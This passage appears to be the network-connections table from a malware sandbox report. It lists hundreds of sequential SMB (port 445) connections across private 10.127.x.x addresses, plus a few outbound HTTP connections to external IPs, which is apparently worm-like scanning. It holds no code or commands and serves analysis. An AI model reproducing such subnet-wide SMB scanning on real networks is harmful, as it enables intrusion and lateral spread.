| N/A | 10.127.0.252:445 | tcp | |
| US | 199.59.243.225:80 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| NL | 80.79.4.25:80 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.1.205:445 | tcp | |
| N/A | 10.127.1.212:445 | tcp | |
| N/A | 10.127.1.230:445 | tcp | |
| N/A | 10.127.1.242:445 | tcp | |
| N/A | 10.127.1.246:445 | tcp | |
| N/A | 10.127.1.236:445 | tcp | |
| N/A | 10.127.1.206:445 | tcp | |
| N/A | 10.127.1.252:445 | tcp | |
| N/A | 10.127.1.207:445 | tcp | |
| N/A | 10.127.1.221:445 | tcp | |
| N/A | 10.127.1.225:445 | tcp | |
| N/A | 10.127.1.214:445 | tcp | |
| N/A | 10.127.1.251:445 | tcp | |
| N/A | 10.127.1.209:445 | tcp | |
| N/A | 10.127.1.215:445 | tcp | |
| N/A | 10.127.1.245:445 | tcp | |
| N/A | 10.127.1.197:445 | tcp | |
| N/A | 10.127.1.240:445 | tcp | |
| N/A | 10.127.1.204:445 | tcp | |
| N/A | 10.127.1.196:445 | tcp | |
| N/A | 10.127.1.241:445 | tcp | |
| N/A | 10.127.1.211:445 | tcp | |
| N/A | 10.127.1.237:445 | tcp | |
| N/A | 10.127.1.193:445 | tcp | |
| N/A | 10.127.1.202:445 | tcp | |
| N/A | 10.127.1.239:445 | tcp | |
| N/A | 10.127.1.199:445 | tcp | |
| N/A | 10.127.2.0:445 | tcp | |
| N/A | 10.127.1.228:445 | tcp | |
| N/A | 10.127.1.217:445 | tcp | |
| N/A | 10.127.1.208:445 | tcp | |
| N/A | 10.127.1.234:445 | tcp | |
| N/A | 10.127.1.232:445 | tcp | |
| N/A | 10.127.1.249:445 | tcp | |
| N/A | 10.127.1.224:445 | tcp | |
| N/A | 10.127.1.238:445 | tcp | |
| N/A | 10.127.1.229:445 | tcp | |
| N/A | 10.127.1.235:445 | tcp | |
| N/A | 10.127.1.195:445 | tcp | |
| N/A | 10.127.1.255:445 | tcp | |
| N/A | 10.127.1.216:445 | tcp | |
| N/A | 10.127.1.222:445 | tcp | |
| N/A | 10.127.1.219:445 | tcp | |
| N/A | 10.127.1.226:445 | tcp | |
| N/A | 10.127.1.250:445 | tcp | |
| N/A | 10.127.1.210:445 | tcp | |
| N/A | 10.127.1.203:445 | tcp | |
| N/A | 10.127.1.220:445 | tcp | |
| N/A | 10.127.1.244:445 | tcp | |
| N/A | 10.127.1.254:445 | tcp | |
| N/A | 10.127.1.253:445 | tcp | |
| N/A | 10.127.1.218:445 | tcp | |
| N/A | 10.127.1.247:445 | tcp | |
| N/A | 10.127.1.200:445 | tcp | |
| N/A | 10.127.1.201:445 | tcp | |
| N/A | 10.127.1.213:445 | tcp | |
| N/A | 10.127.1.227:445 | tcp | |
| N/A | 10.127.1.243:445 | tcp | |
| N/A | 10.127.1.248:445 | tcp | |
| N/A | 10.127.1.231:445 | tcp | |
| N/A | 10.127.1.233:445 | tcp | |
| N/A | 10.127.1.194:445 | tcp | |
| N/A | 10.127.1.223:445 | tcp | |
| N/A | 10.127.1.198:445 | tcp | |
| N/A | 10.127.2.4:445 | tcp | |
| N/A | 10.127.2.30:445 | tcp | |
| N/A | 10.127.2.55:445 | tcp | |
| N/A | 10.127.2.38:445 | tcp | |
| N/A | 10.127.2.11:445 | tcp | |
| N/A | 10.127.2.13:445 | tcp | |
| N/A | 10.127.2.1:445 | tcp | |
| N/A | 10.127.2.28:445 | tcp | |
| N/A | 10.127.2.47:445 | tcp | |
| N/A | 10.127.2.51:445 | tcp | |
| N/A | 10.127.2.25:445 | tcp | |
| N/A | 10.127.2.57:445 | tcp | |
| N/A | 10.127.2.29:445 | tcp | |
| N/A | 10.127.2.5:445 | tcp | |
| N/A | 10.127.2.42:445 | tcp | |
| N/A | 10.127.2.7:445 | tcp | |
| N/A | 10.127.2.60:445 | tcp | |
| N/A | 10.127.2.61:445 | tcp | |
| N/A | 10.127.2.41:445 | tcp | |
| N/A | 10.127.2.50:445 | tcp | |
| N/A | 10.127.2.8:445 | tcp | |
| N/A | 10.127.2.37:445 | tcp | |
| N/A | 10.127.2.2:445 | tcp | |
| N/A | 10.127.2.22:445 | tcp | |
| N/A | 10.127.2.59:445 | tcp | |
| N/A | 10.127.2.32:445 | tcp | |
| N/A | 10.127.2.3:445 | tcp | |
| N/A | 10.127.2.48:445 | tcp | |
| N/A | 10.127.2.58:445 | tcp | |
| N/A | 10.127.2.24:445 | tcp | |
| N/A | 10.127.2.20:445 | tcp | |
| N/A | 10.127.2.18:445 | tcp | |
| N/A | 10.127.2.21:445 | tcp | |
| N/A | 10.127.2.10:445 | tcp | |
| N/A | 10.127.2.9:445 | tcp | |
| N/A | 10.127.2.56:445 | tcp | |
| N/A | 10.127.2.14:445 | tcp | |
| N/A | 10.127.2.43:445 | tcp | |
| N/A | 10.127.2.15:445 | tcp | |
| N/A | 10.127.2.54:445 | tcp | |
| N/A | 10.127.2.40:445 | tcp | |
| N/A | 10.127.2.49:445 | tcp | |
| N/A | 10.127.2.45:445 | tcp | |
| N/A | 10.127.2.6:445 | tcp | |
| N/A | 10.127.2.35:445 | tcp | |
| N/A | 10.127.2.39:445 | tcp | |
| N/A | 10.127.2.53:445 | tcp | |
| N/A | 10.127.2.16:445 | tcp | |
| N/A | 10.127.2.34:445 | tcp | |
| N/A | 10.127.2.63:445 | tcp | |
| N/A | 10.127.2.31:445 | tcp | |
| N/A | 10.127.2.27:445 | tcp | |
| N/A | 10.127.2.64:445 | tcp | |
| N/A | 10.127.2.44:445 | tcp | |
| N/A | 10.127.2.52:445 | tcp | |
| N/A | 10.127.2.19:445 | tcp | |
| N/A | 10.127.2.36:445 | tcp | |
| N/A | 10.127.2.17:445 | tcp | |
| N/A | 10.127.2.33:445 | tcp | |
| N/A | 10.127.2.23:445 | tcp | |
| N/A | 10.127.2.12:445 | tcp | |
| N/A | 10.127.2.46:445 | tcp | |
| N/A | 10.127.2.62:445 | tcp | |
| N/A | 10.127.2.26:445 | tcp | |
| N/A | 10.127.2.66:445 | tcp | |
| N/A | 10.127.2.101:445 | tcp | |
| N/A | 10.127.2.81:445 | tcp | |
| N/A | 10.127.2.84:445 | tcp | |
| N/A | 10.127.2.88:445 | tcp | |
| N/A | 10.127.2.89:445 | tcp | |
| N/A | 10.127.2.72:445 | tcp | |
| N/A | 10.127.2.98:445 | tcp | |
| N/A | 10.127.2.124:445 | tcp | |
| N/A | 10.127.2.99:445 | tcp | |
| N/A | 10.127.2.85:445 | tcp | |
| N/A | 10.127.2.97:445 | tcp | |
| N/A | 10.127.2.107:445 | tcp | |
| N/A | 10.127.2.120:445 | tcp | |
| N/A | 10.127.2.106:445 | tcp | |
| N/A | 10.127.2.114:445 | tcp | |
| N/A | 10.127.2.104:445 | tcp | |
| N/A | 10.127.2.121:445 | tcp | |
| N/A | 10.127.2.111:445 | tcp | |
| N/A | 10.127.2.123:445 | tcp | |
| N/A | 10.127.2.92:445 | tcp | |
| N/A | 10.127.2.78:445 | tcp | |
| N/A | 10.127.2.69:445 | tcp | |
| N/A | 10.127.2.83:445 | tcp | |
| N/A | 10.127.2.82:445 | tcp | |
| N/A | 10.127.2.70:445 | tcp | |
| N/A | 10.127.2.105:445 | tcp | |
| N/A | 10.127.2.119:445 | tcp | |
| N/A | 10.127.2.102:445 | tcp | |
| N/A | 10.127.2.113:445 | tcp | |
| N/A | 10.127.2.103:445 | tcp | |
| N/A | 10.127.2.86:445 | tcp | |
| N/A | 10.127.2.110:445 | tcp | |
| N/A | 10.127.2.125:445 | tcp | |
| N/A | 10.127.2.87:445 | tcp | |
| N/A | 10.127.2.108:445 | tcp | |
| N/A | 10.127.2.73:445 | tcp | |
| N/A | 10.127.2.94:445 | tcp | |
| N/A | 10.127.2.80:445 | tcp | |
| N/A | 10.127.2.90:445 | tcp | |
| N/A | 10.127.2.77:445 | tcp | |
| N/A | 10.127.2.118:445 | tcp | |
| N/A | 10.127.2.128:445 | tcp | |
| N/A | 10.127.2.96:445 | tcp | |
| N/A | 10.127.2.115:445 | tcp | |
| N/A | 10.127.2.71:445 | tcp | |
| N/A | 10.127.2.76:445 | tcp | |
| N/A | 10.127.2.112:445 | tcp | |
| N/A | 10.127.2.117:445 | tcp | |
| N/A | 10.127.2.75:445 | tcp | |
| N/A | 10.127.2.91:445 | tcp | |
| N/A | 10.127.2.127:445 | tcp | |
| N/A | 10.127.2.79:445 | tcp | |
| N/A | 10.127.2.122:445 | tcp | |
| N/A | 10.127.2.109:445 | tcp | |
| N/A | 10.127.2.68:445 | tcp | |
| N/A | 10.127.2.74:445 | tcp | |
| N/A | 10.127.2.65:445 | tcp | |
| N/A | 10.127.2.126:445 | tcp | |
| N/A | 10.127.2.67:445 | tcp | |
| N/A | 10.127.2.95:445 | tcp | |
| N/A | 10.127.2.93:445 | tcp | |
| N/A | 10.127.2.100:445 | tcp | |
| N/A | 10.127.2.116:445 | tcp | |
| N/A | 10.127.2.135:445 | tcp | |
| N/A | 10.127.2.139:445 | tcp | |
| N/A | 10.127.2.163:445 | tcp | |
| N/A | 10.127.2.174:445 | tcp | |
| N/A | 10.127.2.140:445 | tcp | |
| N/A | 10.127.2.144:445 | tcp | |
| N/A | 10.127.2.149:445 | tcp | |
| N/A | 10.127.2.155:445 | tcp | |
| N/A | 10.127.2.133:445 | tcp | |
| N/A | 10.127.2.131:445 | tcp | |
| N/A | 10.127.2.154:445 | tcp | |
| N/A | 10.127.2.141:445 | tcp | |
| N/A | 10.127.2.132:445 | tcp | |
| N/A | 10.127.2.151:445 | tcp | |
| N/A | 10.127.2.130:445 | tcp | |
| N/A | 10.127.2.176:445 | tcp | |
| N/A | 10.127.2.190:445 | tcp | |
| N/A | 10.127.2.147:445 | tcp | |
| N/A | 10.127.2.158:445 | tcp | |
| N/A | 10.127.2.145:445 | tcp | |
| N/A | 10.127.2.148:445 | tcp | |
| N/A | 10.127.2.175:445 | tcp | |
| N/A | 10.127.2.179:445 | tcp | |
| N/A | 10.127.2.168:445 | tcp | |
| N/A | 10.127.2.129:445 | tcp | |
| N/A | 10.127.2.173:445 | tcp | |
| N/A | 10.127.2.181:445 | tcp | |
| N/A | 10.127.2.138:445 | tcp | |
| N/A | 10.127.2.166:445 | tcp | |
| N/A | 10.127.2.170:445 | tcp | |
| N/A | 10.127.2.157:445 | tcp | |
| N/A | 10.127.2.188:445 | tcp | |
| N/A | 10.127.2.187:445 | tcp | |
| N/A | 10.127.2.184:445 | tcp | |
| N/A | 10.127.2.143:445 | tcp | |
| N/A | 10.127.2.150:445 | tcp | |
| N/A | 10.127.2.177:445 | tcp | |
| N/A | 10.127.2.178:445 | tcp | |
| N/A | 10.127.2.136:445 | tcp | |
| N/A | 10.127.2.192:445 | tcp | |
| N/A | 10.127.2.134:445 | tcp | |
| N/A | 10.127.2.137:445 | tcp | |
| N/A | 10.127.2.161:445 | tcp | |
| N/A | 10.127.2.182:445 | tcp | |
| N/A | 10.127.2.164:445 | tcp | |
| N/A | 10.127.2.172:445 | tcp | |
| N/A | 10.127.2.189:445 | tcp | |
| N/A | 10.127.2.191:445 | tcp | |
| N/A | 10.127.2.165:445 | tcp | |
| N/A | 10.127.2.186:445 | tcp | |
| N/A | 10.127.2.153:445 | tcp | |
| N/A | 10.127.2.152:445 | tcp | |
| N/A | 10.127.2.156:445 | tcp | |
| N/A | 10.127.2.162:445 | tcp | |
| N/A | 10.127.2.171:445 | tcp | |
| N/A | 10.127.2.160:445 | tcp | |
| N/A | 10.127.2.167:445 | tcp | |
| N/A | 10.127.2.183:445 | tcp | |
| N/A | 10.127.2.159:445 | tcp | |
| N/A | 10.127.2.169:445 | tcp | |
| N/A | 10.127.2.185:445 | tcp | |
| N/A | 10.127.2.146:445 | tcp | |
| N/A | 10.127.2.180:445 | tcp | |
| N/A | 10.127.2.142:445 | tcp | |
| NL | 80.79.4.25:80 | tcp | |
| N/A | 10.127.2.199:445 | tcp | |
| N/A | 10.127.2.232:445 | tcp | |
| N/A | 10.127.2.209:445 | tcp | |
| N/A | 10.127.2.224:445 | tcp | |
| N/A | 10.127.2.239:445 | tcp | |
| N/A | 10.127.2.245:445 | tcp | |
| N/A | 10.127.2.247:445 | tcp | |
| N/A | 10.127.2.241:445 | tcp | |
| N/A | 10.127.2.240:445 | tcp | |
| N/A | 10.127.2.244:445 | tcp | |
| N/A | 10.127.2.202:445 | tcp | |
| N/A | 10.127.2.213:445 | tcp | |
| N/A | 10.127.2.255:445 | tcp | |
| N/A | 10.127.2.235:445 | tcp | |
| N/A | 10.127.2.242:445 | tcp | |
| N/A | 10.127.2.203:445 | tcp | |
| N/A | 10.127.2.226:445 | tcp | |
| N/A | 10.127.2.252:445 | tcp | |
| N/A | 10.127.2.223:445 | tcp | |
| N/A | 10.127.2.251:445 | tcp | |
| N/A | 10.127.2.210:445 | tcp | |
| N/A | 10.127.2.234:445 | tcp | |
| N/A | 10.127.2.246:445 | tcp | |
| N/A | 10.127.2.200:445 | tcp | |
| N/A | 10.127.2.216:445 | tcp | |
| N/A | 10.127.2.221:445 | tcp | |
| N/A | 10.127.2.194:445 | tcp | |
| N/A | 10.127.2.196:445 | tcp | |
| N/A | 10.127.2.253:445 | tcp | |
| N/A | 10.127.2.250:445 | tcp | |
| N/A | 10.127.2.198:445 | tcp | |
| N/A | 10.127.2.208:445 | tcp | |
| N/A | 10.127.2.205:445 | tcp | |
| N/A | 10.127.2.206:445 | tcp | |
| N/A | 10.127.2.219:445 | tcp | |
| N/A | 10.127.2.193:445 | tcp | |
| N/A | 10.127.2.237:445 | tcp | |
| N/A | 10.127.2.207:445 | tcp | |
| N/A | 10.127.2.204:445 | tcp | |
| N/A | 10.127.2.254:445 | tcp | |
| N/A | 10.127.2.229:445 | tcp | |
| N/A | 10.127.2.225:445 | tcp | |
| N/A | 10.127.2.231:445 | tcp | |
| N/A | 10.127.2.222:445 | tcp | |
| N/A | 10.127.2.215:445 | tcp | |
| N/A | 10.127.2.217:445 | tcp | |
| N/A | 10.127.2.233:445 | tcp | |
| N/A | 10.127.2.211:445 | tcp | |
| N/A | 10.127.2.228:445 | tcp | |
| N/A | 10.127.2.243:445 | tcp | |
| N/A | 10.127.2.238:445 | tcp | |
| N/A | 10.127.2.249:445 | tcp | |
| N/A | 10.127.2.212:445 | tcp | |
| N/A | 10.127.2.195:445 | tcp | |
| N/A | 10.127.3.0:445 | tcp | |
| N/A | 10.127.2.218:445 | tcp | |
| N/A | 10.127.2.227:445 | tcp | |
| N/A | 10.127.2.230:445 | tcp | |
| N/A | 10.127.2.220:445 | tcp | |
| N/A | 10.127.2.197:445 | tcp | |
| N/A | 10.127.2.214:445 | tcp | |
| N/A | 10.127.2.248:445 | tcp | |
| N/A | 10.127.2.201:445 | tcp | |
| N/A | 10.127.2.236:445 | tcp | |
| N/A | 10.127.3.25:445 | tcp | |
| N/A | 10.127.3.6:445 | tcp | |
| N/A | 10.127.3.14:445 | tcp | |
| N/A | 10.127.3.21:445 | tcp | |
| N/A | 10.127.3.55:445 | tcp | |
| N/A | 10.127.3.24:445 | tcp | |
| N/A | 10.127.3.36:445 | tcp | |
| N/A | 10.127.3.40:445 | tcp | |
| N/A | 10.127.3.50:445 | tcp | |
| N/A | 10.127.3.58:445 | tcp | |
| N/A | 10.127.3.12:445 | tcp | |
| N/A | 10.127.3.41:445 | tcp | |
| N/A | 10.127.3.3:445 | tcp | |
| N/A | 10.127.3.29:445 | tcp | |
| N/A | 10.127.3.30:445 | tcp | |
| N/A | 10.127.3.48:445 | tcp | |
| N/A | 10.127.3.37:445 | tcp | |
| N/A | 10.127.3.39:445 | tcp | |
| N/A | 10.127.3.10:445 | tcp | |
| N/A | 10.127.3.18:445 | tcp | |
| N/A | 10.127.3.46:445 | tcp | |
| N/A | 10.127.3.34:445 | tcp | |
| N/A | 10.127.3.57:445 | tcp | |
| N/A | 10.127.3.16:445 | tcp | |
| N/A | 10.127.3.26:445 | tcp | |
| N/A | 10.127.3.22:445 | tcp | |
| N/A | 10.127.3.20:445 | tcp | |
| N/A | 10.127.3.52:445 | tcp | |
| N/A | 10.127.3.15:445 | tcp | |
| N/A | 10.127.3.28:445 | tcp | |
| N/A | 10.127.3.60:445 | tcp | |
| N/A | 10.127.3.59:445 | tcp | |
| N/A | 10.127.3.62:445 | tcp | |
| N/A | 10.127.3.9:445 | tcp | |
| N/A | 10.127.3.5:445 | tcp | |
| N/A | 10.127.3.33:445 | tcp | |
| N/A | 10.127.3.7:445 | tcp | |
| N/A | 10.127.3.27:445 | tcp | |
| N/A | 10.127.3.51:445 | tcp | |
| N/A | 10.127.3.49:445 | tcp | |
| N/A | 10.127.3.44:445 | tcp | |
| N/A | 10.127.3.19:445 | tcp | |
| N/A | 10.127.3.32:445 | tcp | |
| N/A | 10.127.3.1:445 | tcp | |
| N/A | 10.127.3.8:445 | tcp | |
| N/A | 10.127.3.43:445 | tcp | |
| N/A | 10.127.3.11:445 | tcp | |
| N/A | 10.127.3.64:445 | tcp | |
| N/A | 10.127.3.2:445 | tcp | |
| N/A | 10.127.3.31:445 | tcp | |
| N/A | 10.127.3.45:445 | tcp | |
| N/A | 10.127.3.17:445 | tcp | |
| N/A | 10.127.3.23:445 | tcp | |
| N/A | 10.127.3.54:445 | tcp | |
| N/A | 10.127.3.47:445 | tcp | |
| N/A | 10.127.3.61:445 | tcp | |
| N/A | 10.127.3.4:445 | tcp | |
| N/A | 10.127.3.13:445 | tcp | |
| N/A | 10.127.3.42:445 | tcp | |
| N/A | 10.127.3.56:445 | tcp | |
| N/A | 10.127.3.35:445 | tcp | |
| N/A | 10.127.3.38:445 | tcp | |
| N/A | 10.127.3.53:445 | tcp | |
| N/A | 10.127.3.63:445 | tcp | |
| N/A | 10.127.3.75:445 | tcp | |
| N/A | 10.127.3.68:445 | tcp | |
| N/A | 10.127.3.126:445 | tcp | |
| N/A | 10.127.3.73:445 | tcp | |
| N/A | 10.127.3.89:445 | tcp | |
| N/A | 10.127.3.92:445 | tcp | |
| N/A | 10.127.3.67:445 | tcp | |
| N/A | 10.127.3.121:445 | tcp | |
| N/A | 10.127.3.107:445 | tcp | |
| N/A | 10.127.3.118:445 | tcp | |
| N/A | 10.127.3.125:445 | tcp | |
| N/A | 10.127.3.114:445 | tcp | |
| N/A | 10.127.3.101:445 | tcp | |
| N/A | 10.127.3.71:445 | tcp | |
| N/A | 10.127.3.90:445 | tcp | |
| N/A | 10.127.3.104:445 | tcp | |
| N/A | 10.127.3.109:445 | tcp | |
| N/A | 10.127.3.119:445 | tcp | |
| N/A | 10.127.3.98:445 | tcp | |
| N/A | 10.127.3.112:445 | tcp | |
| N/A | 10.127.3.81:445 | tcp | |
| N/A | 10.127.3.93:445 | tcp | |
| N/A | 10.127.3.65:445 | tcp | |
| N/A | 10.127.3.115:445 | tcp | |
| N/A | 10.127.3.102:445 | tcp | |
| N/A | 10.127.3.117:445 | tcp | |
| N/A | 10.127.3.128:445 | tcp | |
| N/A | 10.127.3.113:445 | tcp | |
| N/A | 10.127.3.124:445 | tcp | |
| N/A | 10.127.3.85:445 | tcp | |
| N/A | 10.127.3.103:445 | tcp | |
| N/A | 10.127.3.86:445 | tcp | |
| N/A | 10.127.3.88:445 | tcp | |
| N/A | 10.127.3.111:445 | tcp | |
| N/A | 10.127.3.127:445 | tcp | |
| N/A | 10.127.3.78:445 | tcp | |
| N/A | 10.127.3.99:445 | tcp | |
| N/A | 10.127.3.100:445 | tcp | |
| N/A | 10.127.3.94:445 | tcp | |
| N/A | 10.127.3.70:445 | tcp | |
| N/A | 10.127.3.95:445 | tcp | |
| N/A | 10.127.3.69:445 | tcp | |
| N/A | 10.127.3.80:445 | tcp | |
| N/A | 10.127.3.84:445 | tcp | |
| N/A | 10.127.3.91:445 | tcp | |
| N/A | 10.127.3.110:445 | tcp | |
| N/A | 10.127.3.74:445 | tcp | |
| N/A | 10.127.3.79:445 | tcp | |
| N/A | 10.127.3.106:445 | tcp | |
| N/A | 10.127.3.97:445 | tcp | |
| N/A | 10.127.3.123:445 | tcp | |
| N/A | 10.127.3.72:445 | tcp | |
| N/A | 10.127.3.116:445 | tcp | |
| N/A | 10.127.3.66:445 | tcp | |
| N/A | 10.127.3.77:445 | tcp | |
| N/A | 10.127.3.87:445 | tcp | |
| N/A | 10.127.3.96:445 | tcp | |
| N/A | 10.127.3.82:445 | tcp | |
| N/A | 10.127.3.120:445 | tcp | |
| N/A | 10.127.3.122:445 | tcp | |
| N/A | 10.127.3.108:445 | tcp | |
| N/A | 10.127.3.76:445 | tcp | |
| N/A | 10.127.3.83:445 | tcp | |
| N/A | 10.127.3.105:445 | tcp | |
| N/A | 10.127.3.129:445 | tcp | |
| N/A | 10.127.3.152:445 | tcp | |
| N/A | 10.127.3.136:445 | tcp | |
| N/A | 10.127.3.158:445 | tcp | |
| N/A | 10.127.3.172:445 | tcp | |
| N/A | 10.127.3.151:445 | tcp | |
| N/A | 10.127.3.174:445 | tcp | |
| N/A | 10.127.3.157:445 | tcp | |
